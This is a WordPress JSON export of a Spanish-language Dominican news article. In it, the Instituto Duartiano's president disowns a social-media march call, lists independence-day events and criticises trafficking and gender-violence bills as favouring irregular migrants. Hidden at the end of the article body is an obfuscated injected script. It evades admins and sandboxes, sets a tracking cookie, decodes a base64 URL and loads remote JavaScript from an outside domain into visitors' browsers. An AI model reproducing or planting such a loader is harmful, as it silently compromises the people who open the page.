{"id":14236,"date":"2023-02-21T14:01:15","date_gmt":"2023-02-21T18:01:15","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=14236"},"modified":"2023-02-21T14:01:15","modified_gmt":"2023-02-21T18:01:15","slug":"instituto-duartiano-desmiente-convoque-a-una-marcha-para-proximo-27-de-febrero","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=14236","title":{"rendered":"Instituto Duartiano desmiente convoque a una marcha para pr\u00f3ximo 27 de febrero"},"content":{"rendered":"<p><strong>Santo Domingo, R.D.- <\/strong>El presidente del Instituto Duartiano, Wilson G\u00f3mez Ram\u00edrez, aclar\u00f3 que no est\u00e1 convocando a una supuesta marcha para el pr\u00f3ximo 27 de febrero como aparece en la cuenta de red social \u201cMarcha Patri\u00f3tica RD\u201d, en nombre de esa entidad patri\u00f3tica, e inst\u00f3 a desestimar dicho llamado porque no se corresponde con los lineamientos y el calendario establecidos por esta organizaci\u00f3n.<\/p>\n<p>Manifest\u00f3 que para este lunes las \u00fanicas actividades programadas por el Instituto Duartiano, en conmemoraci\u00f3n del 179 aniversario de la independencia nacional y el d\u00eda de la bandera, son el acto solemne de enhestamiento de la bandera nacional, en el Altar de la Patria, a las 8:00 de la ma\u00f1ana, y el dep\u00f3sito de una ofrenda floral ante las cenizas de los fundadores de la Rep\u00fablica, las 9:00 de la ma\u00f1ana.<\/p>\n<div id=\"\" class=\"mmc_ads \">\n<div id=\"div-gpt-ad-4460069997178-mmc\" class=\"\" data-google-query-id=\"CNia06mWp_0CFVXFhwodHC0D3w\">\n<div id=\"google_ads_iframe_\/22084339\/elCaribe_EyM_MediumBanner_InContent_1_0__container__\">G\u00f3mez Ram\u00edrez inici\u00f3 que tambi\u00e9n est\u00e1 pautada a las 8:30 de la noche, en la sala Carlos Piantini del Teatro Nacional, el concierto \u201cMi m\u00fasica es mi bandera\u201d, en cuya actividad se pondr\u00e1 en alto el merengue con las actuaciones de los int\u00e9rpretes de este popular y contagioso ritmo, Sergio Vargas, Miriam Cruz, Jandy Ventura (El Legado) y Fefita la Grande; en tanto que la bachata estar\u00e1 representada por Luis Miguel del Amargue.<\/div>\n<\/div>\n<\/div>\n<p>Al hablar en un encuentro con otros directivos, el presidente del Instituto Duartiano explic\u00f3 que estas expresiones musicales son aut\u00e9nticas de nuestro pa\u00eds y fueron declaradas por la Organizaci\u00f3n de Naciones Unidas para la Educaci\u00f3n, la Ciencia y la Cultura (Unesco), como patrimonio inmaterial de la humanidad, dada su trascendencia en el mundo de la m\u00fasica.<\/p>\n<p>Exhort\u00f3 a la ciudadan\u00eda a exhibir la bandera nacional en el frente de las viviendas como manifestaci\u00f3n de fervor patrio, reconocimiento y tributo a la obra y ejemplo de Los Trinitarios y su l\u00edder Juan Pablo Duarte y D\u00edez.<\/p>\n<p>Sobre los proyectos de Ley de Trata y el Sistema de Prevenci\u00f3n de Violencia contra la Mujer<\/p>\n<p>El presidente del Instituto Duartiano dijo que los proyectos de ley integral sobre Trata de Personas, Explotaci\u00f3n o Tr\u00e1fico Il\u00edcito de Migrantes, y el que crea el Sistema Integral para la Prevenci\u00f3n, Atenci\u00f3n, Sanci\u00f3n y Erradicaci\u00f3n de la Violencia contra las Mujeres, son una prueba de que se persigue por todos los medios seguir estimulando la incursi\u00f3n masiva de la \u00e9xodo ilegal e indocumentada en el territorio dominicano.<\/p>\n<p>\u201cEstas piezas legislativas coinciden en que reconocen de manera generosa y ligera derechos a favor de migrantes irregulares bastando, para ser intocables, el simple alegato de ser v\u00edctimas de los delitos que se pretenden sancionar y prevenir, y se proponen colocar pesadas cargas y obligaciones sobre los hombros de diversas instituciones p\u00fablicas y empresas privadas, muchas de las cuales pasar\u00edan el fardo al pueblo consumidor\u201d, se\u00f1al\u00f3.<\/p>\n<p>Agreg\u00f3 que mientras que con el proyecto de Ley Integral sobre Trata de Personas, Explotaci\u00f3n o Tr\u00e1fico Il\u00edcito de Migrantes establece en su art\u00edculo 63 que, alegando ser v\u00edctima, se puede gestionar la permanencia regular en el pa\u00eds, mediante la realizaci\u00f3n de los tr\u00e1mites necesarios para obtener permisos migratorios, inclusive, el otorgamiento de la residencia en el pa\u00eds; pudiendo, adem\u00e1s, proveerse de un permiso para trabajar en el pa\u00eds.<\/p>\n<p>Se\u00f1al\u00f3 que en la pieza congresual que se refiere a la protecci\u00f3n de v\u00edctimas de violencia de g\u00e9nero, busca que entidades privadas, sociales y personas que tienen la responsabilidad de aportar para establecer casas de acogidas para las mujeres migrantes ilegales y que la Direcci\u00f3n General de Migraci\u00f3n no pueda deportarlas cuando denuncien violencia de g\u00e9nero o que requieran atenciones.<\/p>\n<p>G\u00f3mez Ram\u00edrez formul\u00f3 un llamado a todos los funcionarios, en especial a los congresistas de todos los partidos o agrupaciones pol\u00edticas, para que asuman con la mayor entereza la m\u00e1s resuelta e intransigente defensa patria, en momentos tan dif\u00edciles como los que en la actualidad enfrenta la Naci\u00f3n dominicana.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Santo Domingo, R.D.- El presidente del Instituto Duartiano, Wilson G\u00f3mez Ram\u00edrez, aclar\u00f3 que no est\u00e1 convocando a una supuesta marcha para el pr\u00f3ximo 27 de febrero como aparece en la cuenta de red social \u201cMarcha Patri\u00f3tica RD\u201d, en nombre de esa entidad patri\u00f3tica, e inst\u00f3 a desestimar dicho llamado porque no se corresponde con los [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":14239,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-14236","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/14236","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14236"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/14236\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14236"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14236"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14236"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}